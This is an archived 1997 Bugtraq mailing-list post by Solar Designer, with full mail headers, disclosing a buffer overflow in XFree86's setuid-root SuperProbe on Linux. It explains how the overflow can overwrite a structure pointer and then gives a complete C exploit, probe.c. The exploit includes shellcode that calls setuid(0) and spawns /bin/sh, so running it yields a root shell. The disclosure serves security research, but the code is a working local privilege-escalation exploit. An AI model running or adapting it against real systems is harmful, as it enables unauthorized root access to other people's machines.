From - Tue Aug 05 09:41:46 1997 Return-Path: Received: from mwunix.mitre.org by smiley.sit (4.1/SMI-4.1) id AA16927; Wed, 5 Mar 97 02:34:52 EST Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by mwunix.mitre.org (8.8.5/8.8.4/mitre.0) with ESMTP id CAA29741; Wed, 5 Mar 1997 02:37:49 -0500 (EST) Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by mbunix.mitre.org (8.8.5/8.8.4/mitre.0) with ESMTP id CAA15818; Wed, 5 Mar 1997 02:37:43 -0500 (EST) Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <33943-11016>; Wed, 5 Mar 1997 02:34:34 -0500 Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.5/8.8.2) with ESMTP id CAA27370; Wed, 5 Mar 1997 02:28:33 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 3171708 for BUGTRAQ@NETSPACE.ORG; Wed, 5 Mar 1997 01:43:53 -0500 Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.5/8.8.2) with ESMTP id BAA23564 for ; Wed, 5 Mar 1997 01:39:06 -0500 Approved-By: aleph1@UNDERGROUND.ORG Received: from fsite.24h.dialup.ru (fsite.24h.dialup.ru [194.87.18.254]) by netspace.org (8.8.5/8.8.2) with SMTP id XAA09417 for bugtraq; Tue, 4 Mar 1997 23:24:28 -0500 Message-Id: <199703050424.XAA09417@netspace.org> Date: Tue, 4 Mar 1997 23:24:28 -0500 Reply-To: solar@IDEAL.RU Sender: Bugtraq List From: solar@IDEAL.RU Subject: Linux SuperProbe exploit To: BUGTRAQ@netspace.org Status: U X-Mozilla-Status: 0005 Content-Length: 3202 Hi! SuperProbe is a program supplied with XFree86 (to determine the type of video hardware installed in the machine), and it is installed setuid root in many Linux distributions. It has already been discussed here that SuperProbe got some buffer overflows, but there still seems to be no exploit. The reason for this might be that the exploit has to be a bit unusual. That's why I decided to post the exploit, as an example of exploiting an overflow without dealing with the return address. The overflow I'm exploiting is in the TestChip function: > static Bool TestChip(chip_p, Chipset) > Chip_Descriptor *chip_p; > int *Chipset; > { > char *p, *p1, name[64]; [...] > (void)strcpy(name, p); > } > if (StrCaseCmp(name, chip_p->name) == 0) [...] > if (chip_p->f(Chipset)) > { > return(TRUE); > } > return(FALSE); > } Chip_Descriptor is defined like this: > typedef Bool (*ProbeFunc) __STDCARGS((int *)); [...] > typedef struct { > char *name; /* Chipset vendor/class name */ > ProbeFunc f; /* Probe function */ [...] > } Chip_Descriptor; It is possible to overwrite the return address by the strcpy, but one byte of chip_p would get zeroed out (since chip_p is located right after the return address, and the string is ASCIIZ). This would cause the program to crash when trying to access chip_p->name for passing it to StrCaseCmp, before the return address is used. That's why I overwrite chip_p to point into an environment variable (well, the return address gets overwritten also, but it's never used), which has an array of pointers to the shellcode (located at the end of the same variable's value) in it. One of these is first used by StrCaseCmp, so it doesn't crash, and the next one is used as the probe function pointer, so the shellcode gets executed when calling chip_p->f() (it might be required to adjust the alignment in my exploit, try values 0 to 3 if the default does't work). --- probe.c --- /* * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 * Copyright (c) 1997 by Solar Designer */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" "\x31\xdb\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 8192 #define alignment 0 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize / 2; i += 4) *(char **)&buffer[i] = get_sp() - 2048; memset(&buffer[bufsize / 2], 0x90, bufsize / 2); strcpy(&buffer[bufsize - 256], shellcode); setenv("SHELLCODE", buffer, 1); memset(buffer, 'x', 72); *(char **)&buffer[72] = get_sp() - 6144 - alignment; buffer[76] = 0; execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); } --- probe.c --- Signed, Solar Designer